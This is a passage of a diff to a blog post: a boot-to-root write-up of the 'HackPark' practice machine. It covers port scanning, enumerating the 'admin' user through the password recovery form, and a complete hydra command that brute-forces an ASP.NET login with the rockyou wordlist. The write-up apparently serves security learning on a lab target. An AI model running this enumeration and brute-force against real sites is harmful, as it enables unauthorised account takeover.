PacketFire/packetfire_site/content/post/hackpark-boot2-root-writeup.md

 [*] Nmap: OS and Service detection performed.
 Please report any incorrect results at https://nmap.org/submit/ .ress (1 host up) scanned in 30.92 seconds
 ```

-This quickly pointed out that the host was a Windows server, most likely Server 2012 and that it was running an open HTTP and RDP server.
+This quickly confirmed that the host was a Windows server, most likely Server 2012 and that it was running an HTTP and RDP server.
 It also pointed out that there was a `robots.txt` link with a few entries.

-While this was a fairly small footprint, I decided to kick off a broader portscan covering ports `1-65535` to make sure I hadn't missed anything and then decided to check out what the site had to offer.
+While this was a fairly small footprint, I decided to kick off a broader portscan covering ports `1-65535` to make sure I hadn't missed anything while I checked out what the website had to offer.

 #### Clicking around the site
-I opened the site to firefox and burp suite to be greeted by a less-than-pleasant clown face.
+I opened the site to firefox to be greeted by a less-than-pleasant clown face.

 ![hack park index](/img/hackpark_http_index.png)

-This looked to be a basic blog site, so I decided to investigate further by performing some happy path crawling around the site.
-This quickly lead me to an admin login page that also provided password recovery page.
+This looked to be a basic blog, so I decided to do some happy path crawling around the site to build up a sitemap in burp as well as my own mental map of the site.
+Shortly after I found an admin login page that also provided a password recovery link.

-I tried a few simple usernames and found that `admin` returned a different result than any of the others.
+I decided to play around with the password recovery and found that `admin` returned a different result than any of the other users I had attempted.

 ![hack park password retreival](/img/hackpark_http_password_retrieval.png)

-Given this user supposed user, and that the earlier broad scan yielded nothing, I supposed it would be worthwhile to kick off a dictionary attack in the background against the `admin` user while I continued to dig around in the site..
+Given this supposed user, and that the earlier broad scan yielded nothing, I chose to kick off a background dictionary attack against the `admin` user while I continued to dig around in the site.

 ### Brute forcing the login page
-I returned to the login page and tried a `admin:test` login to try to identify an element that I could use for a failure parameter in hydra.
+I returned to the login page and tried an `admin:test` login to try to identify an element that I could use for a failure parameter in hydra.
 Failed logins spit out a very simple to match `Login failed` string.
-I then grabbed the rest of the post body from Burp and started a brute with hydra, using rockyou as the source dictionary.
+I grabbed the rest of the post body from Burp and started a brute with hydra, using rockyou as the source dictionary.

 ```
 [*] exec: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.167.66 http-post-form "/Account/login.aspx:__VIEWSTATE=n0dSQaeIUU9td9IiqqxUjQRLt5Vfe9tKftxi264M8uj5KA0zULHSKHjNdqwkzcbSpoimIX3xFLnJz6eAk2EmBlJx3HWWy14YxvnbwBNZczvzFuWjEwLsnVK622pYz9Cw7VQBjYDmS0PHqL0lcA5jxvCn9ILgh4J5Oh8k66K0JOnmXtVC&__EVENTVALIDATION=xjUAebAft2KQN5MffRGhUH5IgDIw1wmzjlNgpt8Vb4N2656viCANryx5yExK93%2BExMUVpVlU%2B%2BHh7jZwqAaf0sH%2Fmg1JISBvUobZVuCj573XBsDtL%2BRyJMOr%2BNWlN4XXAuWjifxkURjzlElA8RJsOQnoIxK8J2daZrZu0wEFAHgf62F0&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"